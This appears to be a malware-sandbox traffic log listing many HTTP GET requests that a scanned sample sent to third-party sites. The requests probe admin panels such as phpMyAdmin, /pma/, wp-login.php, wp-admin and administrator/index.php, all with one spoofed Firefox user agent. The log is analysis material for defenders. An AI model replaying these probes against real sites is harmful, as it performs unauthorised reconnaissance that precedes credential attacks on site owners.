Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: il.cmAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: hul.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: gbya.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: ct.ated.netAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: z-a.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: hul.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: san.eeAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: apee.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: onlist.comAccept: /Accept-Encoding: deflate, gzipCookie: _dhc.139992723=222c8f6b-c030-4c0b-9d05-2464b2dacc4aUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: gr.2mail.comAccept: /Accept-Encoding: deflate, gzipCookie: _dhc.651070=65f6761b-83f1-4927-9f54-1ecf80cdf74eUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: gmo.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: cm.czAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: gmaso.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: noweco.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: ia.euAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: bjail.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: cm.czAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: 6ail.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: a6a.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: ct.ated.netAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: 96l.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: hna.beAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: gr.2mail.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: a6a.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://a6a.com/administrator/
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: gcann.cr.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: il.cmAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: gbya.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: hul.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: gmaso.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: m7l.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: gmo.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: gbya.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: gcann.cr.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: apee.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: hul.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: ia.euAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: ct.ated.netAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: a6a.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.hul.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: san.eeAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: cm.czAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: san.eeAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: apee.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: a6a.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://a6a.com/wp-login.php
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: ct.ated.netAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; caf_ipaddr=10.116.88.58; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://ct.ated.net/wp-login.php
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: gcann.cr.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: gbya.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: gcann.cr.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: cm.czAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: il.cmAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: gbya.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: san.eeAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://san.ee/wp-login.php
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: gmo.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: cm.czAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://cm.cz/wp-login.php
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: m7l.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F; caf_ipaddr=10.116.88.163; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://1.tv/wp-login.php
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: 96l.comAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; caf_ipaddr=10.116.88.77; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://96l.com/wp-login.php
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F; caf_ipaddr=10.116.88.88; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://1.tv/wp-login.php
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: gmaso.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: apee.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: gmaso.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: onlist.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: gr.2mail.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: z-a.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: hul.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: noweco.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: gr.2mail.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: gmaso.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://gmaso.com/wp-login.php
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: gcann.cr.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: gbya.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.hul.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: gmo.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: a6a.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: m7l.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: cm.czAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: onlist.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: cm.czAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: hul.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: apee.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: gcann.cr.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: gbya.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: ia.euAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://nrnet.com/wp-login.php
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: 6ail.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: 96l.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: bjail.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: hna.beAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: san.eeAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: ct.ated.netAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: z-a.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: san.eeAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: gmaso.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.hul.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: apee.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: apee.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: cm.czAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: ct.ated.netAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
